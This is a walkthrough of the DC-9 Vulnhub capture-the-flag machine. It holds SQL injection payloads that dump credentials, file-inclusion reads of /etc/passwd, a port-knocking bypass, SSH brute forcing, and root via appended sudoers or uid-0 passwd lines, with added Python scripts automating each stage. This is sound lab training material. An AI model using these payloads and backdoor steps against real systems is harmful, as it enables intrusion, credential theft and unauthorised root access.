DC9 Vulnhub Walkthrough
Enumeration
nmap
The scan shows a web server on port 80 (and, worth remembering for later, SSH on port 22 is reported as filtered rather than closed). Let's put the target IP in the browser and see what we get.
Exploitation
SQL Injection
After playing with SQL injection for some time, I found that /search.php is injectable.
I used the payload admin' or '1'='1
As we can see from here, every row is returned from the database, so the search term goes into the query unsanitised and the results are reflected in the page, which makes a UNION-based extraction possible.
After testing how many columns the query returns, I found that there are 6, using ' UNION SELECT 1,2,3,4,5,6-- -
By using ' UNION SELECT GROUP_CONCAT(SCHEMA_NAME),2,3,4,5,6 FROM information_schema.schemata-- -
we can see that 2 databases are extracted, Staff and users. We can go further by listing the tables in each of them.
Burp
Let's switch to Burp for easier access; long GROUP_CONCAT results are easier to copy out of the raw response there.
Type this query in the search field, substituting the schema name, and the table names come back in the response. For the Staff database:
' UNION SELECT GROUP_CONCAT(TABLE_NAME),2,3,4,5,6 FROM information_schema.tables WHERE table_schema = 'Staff'-- -
We can see that Staff has 2 tables named StaffDetails and Users.
The same query with table_schema = 'Users' gives nothing back in the response. That does not mean the second database has no tables: MySQL database names are case-sensitive on Linux, and the schema is actually called users in lowercase, which is why the query further down with 'users' works.
Next, we want to extract the columns of those tables.
Type
' UNION SELECT GROUP_CONCAT(TABLE_NAME,':',COLUMN_NAME),2,3,4,5,6 FROM information_schema.columns WHERE table_schema="Staff"-- -
to extract them.
We get all the columns of the 2 tables in Staff, each one prefixed with its table name.
GROUP_CONCAT joins everything with commas, so let's paste it into the terminal and separate it into table:column pairs.
We then extract the users database's table columns with
' UNION SELECT GROUP_CONCAT(table_name,':',column_name),2,3,4,5,6 FROM information_schema.columns WHERE table_schema='users'-- -
Paste it into the terminal again and separate it properly.
Now we have the columns of the tables in both databases. Let's save them for later reference.
Let's take the Users table in the Staff database first.
Among its columns are Username and Password, so let's extract those by typing
' UNION SELECT GROUP_CONCAT(Username,':',Password),2,3,4,5,6 FROM Staff.Users-- -
Save the result in CherryTree and extract the other table:
' UNION SELECT GROUP_CONCAT(username,':',password),2,3,4,5,6 FROM users.UserDetails-- -
We get the full list of user:password pairs; save it the same way as before.
Now we can log in with the admin credentials, but the Password column in Staff.Users holds an MD5 hash rather than the plaintext, so let's crack that first.
Paste the hash into an online MD5 lookup site and choose MD5; it is an unsalted hash, so a lookup is enough.
The password is transorbital1
Log in with these credentials at /manage.php
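To tie the whole SQL injection phase together, here is an added Python helper (my own example, not part of the original walkthrough and not code from the DC-9 box). It builds the same 6-column UNION payloads used above, parses the comma-joined GROUP_CONCAT output into table:column and user:password pairs, flags 32-hex MD5 values like the one we just cracked, and splits the credential pairs into the two lists that the SSH brute force in the Ncrack section needs. The sample strings inside it are constructed; the column names and user values are placeholders, not the real dump.

```python
"""Helpers for the union-based SQL injection used against /search.php.

Added example, not code from the original walkthrough.  It assumes a
6-column UNION point (found with ' UNION SELECT 1,2,3,4,5,6-- -), builds
the information_schema payloads from the text, then parses the
GROUP_CONCAT strings the tester copies out of the response.  The sample
strings at the bottom are constructed to match the shape of the output.
"""
import re

COLS = 6  # number of columns in the original SELECT, found by trial

# GROUP_CONCAT silently truncates at group_concat_max_len (1024 bytes by
# default); a result of about that length means the dump is incomplete.
GROUP_CONCAT_MAX_LEN = 1024


def union_payload(expr, source=None):
    """Place `expr` in column 1 and pad columns 2..COLS with literals."""
    pad = ",".join(str(i) for i in range(2, COLS + 1))
    tail = f" FROM {source}" if source else ""
    return f"' UNION SELECT {expr},{pad}{tail}-- -"


def schemas_payload():
    return union_payload("GROUP_CONCAT(SCHEMA_NAME)", "information_schema.schemata")


def tables_payload(schema):
    # Schema names are case-sensitive on Linux MySQL: 'users' != 'Users'.
    return union_payload(
        "GROUP_CONCAT(TABLE_NAME)",
        f"information_schema.tables WHERE table_schema='{schema}'")


def columns_payload(schema):
    return union_payload(
        "GROUP_CONCAT(table_name,':',column_name)",
        f"information_schema.columns WHERE table_schema='{schema}'")


def dump_payload(schema, table, user_col, pass_col):
    return union_payload(f"GROUP_CONCAT({user_col},':',{pass_col})",
                         f"{schema}.{table}")


def maybe_truncated(group_concat_text):
    """True when the result is long enough to have hit group_concat_max_len."""
    return len(group_concat_text.encode()) >= GROUP_CONCAT_MAX_LEN


def parse_columns(group_concat_text):
    """'T1:c1,T1:c2,T2:c3' -> {'T1': ['c1', 'c2'], 'T2': ['c3']}."""
    out = {}
    for item in filter(None, group_concat_text.split(",")):
        table, col = item.split(":", 1)
        out.setdefault(table, []).append(col)
    return out


def parse_creds(group_concat_text):
    """'u1:p1,u2:p2' -> [('u1', 'p1'), ('u2', 'p2')]."""
    pairs = []
    for item in filter(None, group_concat_text.split(",")):
        user, secret = item.split(":", 1)
        pairs.append((user, secret))
    return pairs


MD5_RE = re.compile(r"^[0-9a-f]{32}$", re.IGNORECASE)


def is_md5(value):
    """True for a 32-hex-char string, i.e. an unsalted MD5 like Staff.Users holds."""
    return bool(MD5_RE.match(value))


def split_for_spray(pairs):
    """Separate credential pairs into ordered, de-duplicated user and
    password lists: the two files ncrack/medusa take with -U and -P."""
    users = list(dict.fromkeys(u for u, _ in pairs))
    passwords = list(dict.fromkeys(p for _, p in pairs))
    return users, passwords


# Constructed sample outputs: same shape as the real responses, fake values.
SAMPLE_COLUMNS = "StaffDetails:id,StaffDetails:firstname,Users:UserID,Users:Username,Users:Password"
SAMPLE_STAFF = "admin:5f4dcc3b5aa765d61d8327deb882cf99"   # md5("password"), not the box's hash
SAMPLE_USERS = "alice:Sekret1,bob:Passw0rd,alice:Sekret1"

if __name__ == "__main__":
    print(schemas_payload())
    print(tables_payload("users"))
    print(parse_columns(SAMPLE_COLUMNS))
    users, pws = split_for_spray(parse_creds(SAMPLE_USERS))
    print("users:", users, "passwords:", pws)
```

The payload strings it produces are byte-for-byte the ones typed into the search field above, so it doubles as a check that a payload pasted into Burp has the right column count. Feed the real GROUP_CONCAT text into parse_creds and split_for_spray, write the two lists to files, and they are ready for ncrack -U users.txt -P passwords.txt ssh://TARGET (file names assumed).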
Wfuzz
After logging in we see the message "File does not exist", which hints at a file-inclusion feature whose parameter name we don't know, so I decided to use wfuzz to find it.
After some tries, this is what works: grab the PHPSESSID cookie from Burp and pass it in the wfuzz command so the requests are authenticated, and use ../../../../../etc/passwd as the value of the fuzzed parameter so that a correct guess produces a visibly different response. Basically it is trial and error. To filter out the misses we need the word count of a failed response, so run without --hw first, note the length, and only then rerun with that word count specified to hide it. The command looks like this
Every miss is 100 words, so we specify the parameter --hw as 100
With the noise hidden, the only result left is the file parameter.
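As an added example (not the page's wfuzz command, which was only shown as a screenshot), the following Python reproduces what that fuzz run does: it sends ../../../../../etc/passwd as the value of each candidate parameter name, with the session cookie attached, measures the word count of every response, and keeps only those that differ from the baseline or contain a passwd marker, which is what --hw 100 achieved. The target URL, cookie value and wordlist are placeholders, and the canned pages it tests itself against are constructed, with the miss page padded to exactly 100 words.

```python
"""Discover the name of a file-inclusion parameter by response size.

Added example, not the walkthrough's wfuzz command.  It mirrors that run:
the PHPSESSID cookie makes the request authenticated, a traversal path is
the value of each guessed parameter name, and responses whose word count
equals the baseline are hidden (wfuzz --hw).  URL, cookie and wordlist are
placeholders; the pages served by fake_fetch are constructed.
"""
import urllib.parse
import urllib.request

PAYLOAD = "../../../../../etc/passwd"
MARKER = "root:x:0:0"                  # present only if passwd was really included
CANARY_PARAM = "zzz_not_a_real_param"  # assumed unused by the app; gives the baseline


def http_get(url, cookie=None, timeout=10):
    """Plain GET with an optional Cookie header, e.g. 'PHPSESSID=...'."""
    headers = {"Cookie": cookie} if cookie else {}
    req = urllib.request.Request(url, headers=headers)
    with urllib.request.urlopen(req, timeout=timeout) as resp:
        return resp.read().decode("utf-8", errors="replace")


def word_count(body):
    return len(body.split())  # wfuzz's "Words" column is a whitespace split


def find_lfi_param(fetch, base_url, candidates, cookie=None):
    """Return (baseline_word_count, [(name, words, marker_found), ...])."""
    def url_for(name):
        return base_url + "?" + urllib.parse.urlencode({name: PAYLOAD})

    baseline = word_count(fetch(url_for(CANARY_PARAM), cookie))
    hits = []
    for name in candidates:
        body = fetch(url_for(name), cookie)
        words = word_count(body)
        found = MARKER in body
        if words != baseline or found:   # differs from a miss, or proves inclusion
            hits.append((name, words, found))
    return baseline, hits


# --- constructed responses for an offline self-test -------------------------
# The miss page is padded to exactly 100 words, the count hidden with --hw 100.
_BASE_PAGE = " ".join(f"w{i}" for i in range(96)) + " File does not exist"
_PASSWD = "\n".join([
    "root:x:0:0:root:/root:/bin/bash",
    "daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin",
    "fredf:x:1003:1003:fredf,,,:/home/fredf:/bin/bash",
])


def fake_fetch(url, cookie=None):
    """Stand-in server: only ?file= includes the (fake) passwd, and only when a
    session cookie is sent, mirroring why PHPSESSID had to be passed to wfuzz."""
    query = urllib.parse.parse_qs(urllib.parse.urlsplit(url).query)
    if cookie and "file" in query and query["file"][0] == PAYLOAD:
        return _BASE_PAGE + "\n" + _PASSWD
    return _BASE_PAGE


if __name__ == "__main__":
    wordlist = ["id", "page", "file", "view", "path"]  # a real run uses a parameter-name list
    base, hits = find_lfi_param(fake_fetch, "http://TARGET/manage.php",
                                wordlist, cookie="PHPSESSID=example")
    print("baseline words:", base)
    for name, words, found in hits:
        print(f"{name}: {words} words, passwd marker {'present' if found else 'absent'}")
```

Swap fake_fetch for http_get and a real parameter-name wordlist to run it against the box. Comparing against a baseline request with a deliberately bogus parameter, rather than a hard-coded 100, is what keeps the filter honest when the miss page changes size between sessions.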
Searching For Good Stuff
If we append ?file=../../../../../etc/passwd to the URL, we get the contents of /etc/passwd back, confirming the local file inclusion.
After further enumeration, I know from an IppSec video that /proc/sched_debug lists every process running on the machine, so let's include that file next.
It's rather long, so let's save it to a file.
Then, since we only want the task names, use awk to print the task column only.
Port Knocking
In that list I saw knockd running. Still remember the nmap scan? SSH port 22 was filtered, and knockd is what is hiding it. Let's read its configuration through the same inclusion at /etc/knockd.conf
We can see that to get the port opened we have to hit the knock ports in the correct order, 7469,8475,9842; to close it again, the same ports are hit the other way round.
Since we want the port open, we can use nmap to send the knocks in that order with the -r parameter (scan the given ports sequentially instead of in random order). This only works because the sequence happens to be ascending, and knockd expects the whole sequence within its timeout, so scan just those three ports.
Run the normal nmap scan again, and we can see that the SSH port is open now.
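Instead of relying on nmap -r, which only replays this knock correctly because the sequence happens to be ascending, here is an added Python example (mine, not from the walkthrough) that parses a knockd.conf, knocks the ports in the configured order, and then checks whether port 22 opened. The configuration text inside is constructed to match what the page reports (openSSH 7469,8475,9842 and the same ports reversed to close); the iptables command lines in it are typical knockd usage and an assumption, as is the target address.

```python
"""Parse knockd.conf and replay the open sequence.

Added example, not code from the walkthrough (which used nmap -r).  The
config below is constructed to match what the page reports; the command
lines are typical knockd usage and an assumption.  knockd watches for a
SYN on each port in order, so a refused connection still counts as a knock.
"""
import configparser
import socket

SAMPLE_KNOCKD_CONF = """\
[options]
    UseSyslog

[openSSH]
    sequence    = 7469,8475,9842
    seq_timeout = 25
    command     = /sbin/iptables -I INPUT -s %IP% -p tcp --dport 22 -j ACCEPT
    tcpflags    = syn

[closeSSH]
    sequence    = 9842,8475,7469
    seq_timeout = 25
    command     = /sbin/iptables -D INPUT -s %IP% -p tcp --dport 22 -j ACCEPT
    tcpflags    = syn
"""


def parse_knockd(conf_text):
    """Return {section: [port, ...]} for every section that defines a sequence."""
    # allow_no_value for bare 'UseSyslog'; no interpolation so '%IP%' is left alone
    cp = configparser.ConfigParser(allow_no_value=True, interpolation=None)
    cp.read_string(conf_text)
    seqs = {}
    for section in cp.sections():
        if cp.has_option(section, "sequence"):
            seqs[section] = [int(p) for p in cp.get(section, "sequence").split(",")]
    return seqs


def tcp_syn(host, port, timeout=0.5):
    """Attempt a TCP connect; knockd only needs the SYN, so errors are ignored."""
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
        s.settimeout(timeout)
        try:
            s.connect((host, port))
        except OSError:
            pass


def knock(host, ports, sender=tcp_syn):
    """Hit `ports` in order (within seq_timeout); returns the ports sent."""
    sent = []
    for port in ports:
        sender(host, port)
        sent.append(port)
    return sent


def nmap_r_is_enough(ports):
    """nmap -r scans the listed ports in ascending order, so it replays the
    sequence correctly only when the sequence is already ascending."""
    return list(ports) == sorted(ports)


def port_open(host, port, timeout=2.0):
    """The 'run nmap again' step: did the knock actually expose the port?"""
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
        s.settimeout(timeout)
        try:
            s.connect((host, port))
            return True
        except OSError:
            return False


if __name__ == "__main__":
    import sys
    host = sys.argv[1] if len(sys.argv) > 1 else "127.0.0.1"  # target IP: assumed
    seqs = parse_knockd(SAMPLE_KNOCKD_CONF)   # in practice, the file fetched via the LFI
    print("nmap -r would do:", nmap_r_is_enough(seqs["openSSH"]))
    print("knocked:", knock(host, seqs["openSSH"]))
    print("ssh open:", port_open(host, 22))
```

Pass the real /etc/knockd.conf text you retrieved through the inclusion to parse_knockd; the closeSSH sequence is handled the same way, which matters because nmap -r cannot replay a descending sequence.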
Now we can use the credentials we dumped earlier and let a tool brute force SSH with them.
We need to split the username:password pairs into 2 files, one of usernames and one of passwords.
Ncrack
Then we can use ncrack to brute force the SSH logins with those two lists.
Now we can log in!
Privilege Escalation
After logging in as some of those users, I found that the janitor user has a directory called .secrets-for-putin
After cat on the file inside that directory, we get some more passwords.
Save these passwords into a file and run ncrack again with the users file.
I faced some problems using ncrack, so I changed to Medusa.
We find that user fredf can log in with one of the new passwords.
Method 1
Then, type sudo -l
We can see that there is a sudo right that can be exploited: fredf may run /opt/devstuff/dist/test/test as root.
Run sudo /opt/devstuff/dist/test/test
From the output we can see that test.py, which this binary wraps, is not running properly without arguments. Navigate to /opt/devstuff and we find the test.py source.
Open it with nano test.py
We can see that if the number of arguments is not equal to 3, the script prints an error and exits. With 3 arguments, it opens the first file in read mode and appends its contents to the second file. Since it runs as root, that is an arbitrary append to any file on the system, including /etc/sudoers and /etc/passwd.
Navigate to /tmp
We want to add a sudoers rule giving fredf full sudo. Put the line into a file with echo "fredf ALL=(ALL:ALL) ALL" > sudo_Add (this form still prompts for fredf's password, which we know; NOPASSWD: ALL would skip the prompt).
Optionally, first copy the content of /etc/sudoers into /tmp/sudo_Add with sudo /opt/devstuff/dist/test/test /etc/sudoers sudo_Add so you can read the root-only file and check the rule format. Note that the whole file is then appended back in the next step, which is untidy but harmless.
Then we can type sudo /opt/devstuff/dist/test/test /tmp/sudo_Add /etc/sudoers
to read the line from our sudo_Add file and append it to the /etc/sudoers file. Be careful here: nothing runs visudo's syntax check on this path, and a malformed line appended to sudoers breaks sudo for every user.
Then, we can type sudo -l again and the new rule shows up.
Type sudo /bin/bash
and we get root.
Method 2
We can use openssl to create a password hash and append a new user line to /etc/passwd.
First run cat /etc/passwd | grep fredf to see the format of the line we want to model ours on.
Original
fredf is the username
x in the second field means the password hash lives in /etc/shadow, not here
1003 is the uid, and the 1003 after it is the gid
then the name (GECOS field), home directory and login shell
Modified
The second field now holds the hash generated with openssl passwd, so the login check uses it directly without consulting /etc/shadow, and 0 for both uid and gid makes the account root.
Write the modified line to a file (again called sudo_Add here) and run sudo /opt/devstuff/dist/test/test sudo_Add /etc/passwd to append it.
Then we su to the username we created, for me choo
The password is the one given as the second argument to the openssl passwd command, so damn
Got root!
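Both privilege-escalation methods use the same primitive, a root-owned append of one file onto another, so here is an added Python example (mine, not the walkthrough's commands and not the box's test.py) that rehearses both against scratch copies of sudoers and passwd in a temporary directory. Its append_file reproduces only the behaviour the text describes for test.py; the sudoers rule is syntax-checked before use because a malformed line breaks sudo; the passwd line is built with a constructed placeholder hash standing in for openssl passwd output; and uid0_users is the check a defender would run afterwards. The user names, file names and the hash are assumptions.

```python
"""Turn the arbitrary-file-append primitive from test.py into root.

Added example, not the walkthrough's commands.  append_file() reproduces
only the behaviour the text describes for /opt/devstuff/dist/test/test
(read argument 1, append it to argument 2) so both methods can be rehearsed
on scratch copies of sudoers and passwd.  The hash below is a constructed
placeholder, not real 'openssl passwd -1' output; names are assumptions.
"""
import os
import re
import tempfile


def append_file(src, dst):
    """Behaviour of the sudo-able helper as the walkthrough describes it."""
    with open(src) as f:
        data = f.read()
    with open(dst, "a") as f:
        f.write(data)


SUDOERS_RULE_RE = re.compile(r"^\S+\s+ALL=\(ALL(:ALL)?\)\s+(NOPASSWD:\s*)?ALL$")


def sudoers_rule(user, nopasswd=False):
    """'fredf ALL=(ALL:ALL) ALL' as in the text, or the NOPASSWD variant so sudo
    does not prompt.  A malformed line breaks sudo for everyone and nothing on
    the append path runs visudo, so the rule is checked against the grammar."""
    rule = f"{user} ALL=(ALL:ALL) {'NOPASSWD: ' if nopasswd else ''}ALL"
    if not SUDOERS_RULE_RE.match(rule):
        raise ValueError(f"refusing to write malformed sudoers rule: {rule!r}")
    return rule + "\n"


def passwd_entry(user, pw_hash, uid=0, gid=0, home="/root", shell="/bin/bash"):
    """Build a 7-field /etc/passwd line.  The second field carries the hash
    itself (instead of 'x', which defers to /etc/shadow) so the entry works
    without touching shadow; uid/gid 0 make the account root-equivalent."""
    if not pw_hash.startswith("$"):
        raise ValueError("expected a crypt(3) hash such as 'openssl passwd -1 ...' output")
    if ":" in user or ":" in pw_hash:
        raise ValueError("':' is the field separator and cannot appear in a field")
    return f"{user}:{pw_hash}:{uid}:{gid}:{user}:{home}:{shell}\n"


def uid0_users(passwd_text):
    """Accounts with uid 0; anything besides root here is a classic backdoor IOC."""
    users = []
    for line in passwd_text.splitlines():
        fields = line.split(":")
        if len(fields) == 7 and fields[2] == "0":
            users.append(fields[0])
    return users


def rehearse(workdir=None):
    """Run both methods against scratch files; returns (sudoers, passwd) text."""
    if workdir is None:
        with tempfile.TemporaryDirectory() as tmp:
            return rehearse(tmp)
    sudoers = os.path.join(workdir, "sudoers")
    passwd = os.path.join(workdir, "passwd")
    staging = os.path.join(workdir, "sudo_Add")   # the file name the text uses
    with open(sudoers, "w") as f:
        f.write("root ALL=(ALL:ALL) ALL\n")
    with open(passwd, "w") as f:
        f.write("root:x:0:0:root:/root:/bin/bash\n")
        f.write("fredf:x:1003:1003:fredf,,,:/home/fredf:/bin/bash\n")

    # Method 1: stage the rule, then append it to sudoers through the helper.
    with open(staging, "w") as f:
        f.write(sudoers_rule("fredf", nopasswd=True))
    append_file(staging, sudoers)

    # Method 2: stage a uid-0 user with a known hash and append it to passwd.
    fake_hash = "$1$constructed$placeholderhash"   # stands in for openssl passwd -1 output
    with open(staging, "w") as f:
        f.write(passwd_entry("choo", fake_hash))
    append_file(staging, passwd)

    with open(sudoers) as f, open(passwd) as g:
        return f.read(), g.read()


if __name__ == "__main__":
    sudo_text, passwd_text = rehearse()
    print(sudo_text)
    print(passwd_text)
    print("uid-0 accounts:", uid0_users(passwd_text))
```

On the real box the two staged lines go through sudo /opt/devstuff/dist/test/test exactly as above, with a hash from openssl passwd -1 (MD5-crypt) or openssl passwd -6 (SHA-512-crypt) in place of the placeholder. Either way, make sure the target file ends with a newline before appending, or the new line fuses with the last existing one.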
Congratulations!